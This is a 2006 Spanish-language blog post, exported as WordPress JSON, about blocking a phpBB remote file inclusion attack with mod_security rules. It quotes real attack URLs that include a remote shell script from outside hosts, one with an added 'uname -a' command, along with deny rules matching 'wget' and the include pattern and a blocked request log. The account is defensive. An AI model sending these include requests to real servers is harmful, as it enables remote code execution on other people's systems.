{"id":277,"date":"2006-04-26T21:58:24","date_gmt":"2006-04-26T21:58:24","guid":{"rendered":"http:\/\/blografia.net\/vicm3\/?p=277"},"modified":"2006-04-26T21:58:24","modified_gmt":"2006-04-26T21:58:24","slug":"mod_security-2","status":"publish","type":"post","link":"https:\/\/blografia.net\/vicm3\/2006\/04\/mod_security-2\/","title":{"rendered":"Mod_security"},"content":{"rendered":"

En algun momento mencione algo de esto… y la razon de por que lo estaba poniendo en mis maquinas… un buen ejemplo paso hace poco que no tenia oportunidad de actualizar una aplicaci\u00f3n pero existia una manera de explotarla pero yo no podia parcharla hasta estar seguro, esto me planteaba dos posibilidades. 1) Sacar la aplicacion de producci\u00f3n 2) Arriesgarme a que explotaran esa debilidad…. Sin embargo mod_security permite un ‘hack’ es decir un arreglo rapido… <\/p>\n

Digamos que alguien ya habia logrado colocar un bot de irc..<\/p>\n

\nphpbb\/page_tail.php?includePath=http:\/\/websurvey.burstmedia.com\/cmd.gif\n<\/p><\/blockquote>\n

Podran ver que en donde esta el problema es que page_tail.php permite la inclusion de una pagina externa (la cual tiene como gif un shell es interesante si lo ven con un wget o con telnet, un navegador les va a decir que la imagen esta mal), entonces mientras me enteraba si existia un mejor fix y lidiaba con quien andaba merodeando por ahi… me a\u00f1adi dos reglas (una de las cuales ya tenia pero no habia activado por un bomberazo).<\/p>\n

\nSecFilterSelective THE_REQUEST \u00abwget \u00bb
\nSecFilterSelective THE_REQUEST \u00abp?includePath=http\u00bb\n<\/p><\/blockquote>\n

La primera revisa en las peticiones si encuentra la cadena wget y le da deny con un 403 y lo manda al log (claro requiere de configuraci\u00f3n) pero aqui esta la parte practica.<\/p>\n

La segunda busca la cadena especifica del exploit no solo en page_tail, sino practicamente en cualquier php… bueno aunque solo estuvo 12 horas sin parcharse justo quien tenia ganas de jugar siguio tocando a la puerta ;D<\/p>\n

\nUNIQUE_ID: RE6UJMgXcZYAACo8AaU
\nRequest: 200.154.52.5 – – [25\/Apr\/2006:16:27:00 -0500] \u00abGET phpbb\/page_tail.php?includePath=http:\/\/www.mptechno.cz\/cse.gif?&cmd=uname%20-a
\nHTTP\/1.0\u00bb 403 237
\nHandler: (null)
\n—————————————-
\nGET phpbb\/page_tail.php?includePath=http:\/\/www.mptechno.cz\/cse.gif?&cmd=uname%20-a HTTP\/1.0
\nAccept: text\/xml,application\/xml,application\/xhtml+xml,text\/html;q=0.9,text\/plai
\nn;q=0.8,image\/png,*\/*;q=0.5
\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
\nAccept-Language: pt-br,pt;q=0.5
\nCache-Control: max-age=259200
\nConnection: keep-alive
\nHost: foobar
\nUser-Agent: Mozilla\/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.12) Gecko\/200
\n50919 Firefox\/1.0.7
\nVia: 1.1 loncoche.dialterra.com.br:3128 (squid\/2.5.STABLE11)
\nX-Forwarded-For: 201.48.50.10
\nmod_security-message: Access denied with code 403. Pattern match \u00abp?includePath=
\nhttp\u00bb at THE_REQUEST.
\nmod_security-action: 403\n<\/p><\/blockquote>\n

Es decir, **via mod_security puede uno bloquear ataques conocidos AUN antes de que exista un parche** para el problema o encontremos una soluci\u00f3n al mismo.<\/p>\n

En cierta forma me recuerda mucho el protowrapper de Gwolf… y como tal presenta probables exploits en si mismos, pero pensandolo bien, \u00abNada es seguro… solo los impuestos y la muerte\u00bb.<\/p>\n

Y la idea era comentar un poco la utilidad de mod_security.
\nEn fin.
\nLa historia se repite. Ese es uno de sus inconvenientes.
\n– Abresille.<\/p>\n","protected":false},"excerpt":{"rendered":"

En algun momento mencione algo de esto… y la razon de por que lo estaba poniendo en mis maquinas… un buen ejemplo paso hace poco que no tenia oportunidad de actualizar una aplicaci\u00f3n pero existia una manera de explotarla pero … Sigue leyendo →<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2},"jetpack_post_was_ever_published":false},"categories":[1],"tags":[],"class_list":["post-277","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":161,"url":"https:\/\/blografia.net\/vicm3\/2005\/11\/mod_security\/","url_meta":{"origin":277,"position":0},"title":"mod_security","author":"vicm3","date":"3 noviembre, 2005","format":false,"excerpt":"Tenia rato que quer\u00eda implementar mod_security en apache, la pregunta directa seria \u00bfpara que? Bueno en varias de mis maquinas tengo que correr aplicaciones php y\/o html que est\u00e1n expuestas a ataques de inyecci\u00f3n de SQL, variables, etc., y pues creo que es mas sencillo el usar el modulo para\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":633,"url":"https:\/\/blografia.net\/vicm3\/2009\/03\/debian-moodle-suhosin\/","url_meta":{"origin":277,"position":1},"title":"Debian + Moodle + Suhosin","author":"vicm3","date":"13 marzo, 2009","format":false,"excerpt":"Resulta que viendo los headers de un sitio que frecuento (curl -i) me di cuenta que corren php-suhosin, el cual es una aproximaci\u00f3n similar a mod_security, pero sin los problemas de licenciamiento del mismo, de hecho ya alguien en otro momento me lo hab\u00eda sugerido cuando tuve que dejar atr\u00e1s\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":292,"url":"https:\/\/blografia.net\/vicm3\/2006\/05\/respuesta_a_un_post\/","url_meta":{"origin":277,"position":2},"title":"Respuesta a un post","author":"vicm3","date":"28 mayo, 2006","format":false,"excerpt":"En un foro que probablemente implemento mod_security y esta filtrando contenido con comandos de linux. el problem parece estar en estas lineas, cambie el formato para ver si me deja mostrar algo... May 21 12:21:56 localhost kernel: 201.140.53.38 sent an invalid ICMP type 3, cod e 1 error to a\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":440,"url":"https:\/\/blografia.net\/vicm3\/2007\/07\/robots_defacers\/","url_meta":{"origin":277,"position":3},"title":"Robots defacers","author":"vicm3","date":"10 julio, 2007","format":false,"excerpt":"A ultimas fechas me he encontrado con que los defacers y\/o script kiddies ya tienen unos scripts (valga la rebusnancia), automatizados en perl [code='Bash'] dominioatacado.com:75.126.134.16 - - [10\/Jul\/2007:01:34:30 -0500] \"GET \/guruforo\/index.php\/modules\/Forums\/admin\/admin_styles.php?phpb b_root_path=http:\/\/floydz.imess.net\/cmd.txt? HTTP\/1.1\" 200 56485 \"-\" \"libwww-perl\/5.805\" dominioatacado.com:75.126.134.16 - - [10\/Jul\/2007:10:07:56 -0500] \"GET \/guruforo\/index.php\/MOD_forum_fields_parse.php?phpbb_root_path =http:\/\/floydz.imess.net\/cmd.txt? HTTP\/1.1\" 200 56480 \"-\" \"libwww-perl\/5.805\"\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1687,"url":"https:\/\/blografia.net\/vicm3\/2016\/11\/otra-de-trivia\/","url_meta":{"origin":277,"position":4},"title":"Otra de trivia","author":"vicm3","date":"11 noviembre, 2016","format":false,"excerpt":"O m\u00e1s bien de un ejercicio que hago en clase, hay que afirmar o negar una larga lista de sentencias que he recopilado en la red, hoy he visto fuertemente aparecer una Los primeros tres d\u00edgitos del c\u00f3digo de barras te sirven para saber en qu\u00e9 pa\u00eds fue construido un\u2026","rel":"","context":"En \u00abDebraye\u00bb","block_context":{"text":"Debraye","link":"https:\/\/blografia.net\/vicm3\/category\/debraye\/"},"img":{"alt_text":"14956488_10209368642685156_8795654240038979386_n","src":"https:\/\/i0.wp.com\/blografia.net\/vicm3\/wp-content\/uploads\/2016\/11\/14956488_10209368642685156_8795654240038979386_n.jpg?resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blografia.net\/vicm3\/wp-content\/uploads\/2016\/11\/14956488_10209368642685156_8795654240038979386_n.jpg?resize=350%2C200 1x, https:\/\/i0.wp.com\/blografia.net\/vicm3\/wp-content\/uploads\/2016\/11\/14956488_10209368642685156_8795654240038979386_n.jpg?resize=525%2C300 1.5x"},"classes":[]},{"id":64,"url":"https:\/\/blografia.net\/vicm3\/2005\/03\/inventos\/","url_meta":{"origin":277,"position":5},"title":"Inventos","author":"vicm3","date":"1 marzo, 2005","format":false,"excerpt":"Varios inventos que me harian rico, y evitarian que siquiera necesitara trabajar y que en un momento dado me han pedido en la oficina: 1) Un programa que con solo el \"nombre\" de la persona, y un apellido, me diga cual es su correo electronico y si recibio el envio\u2026","rel":"","context":"En \u00abGeneral\u00bb","block_context":{"text":"General","link":"https:\/\/blografia.net\/vicm3\/category\/general\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts\/277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/comments?post=277"}],"version-history":[{"count":0,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts\/277\/revisions"}],"wp:attachment":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/media?parent=277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/categories?post=277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/tags?post=277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}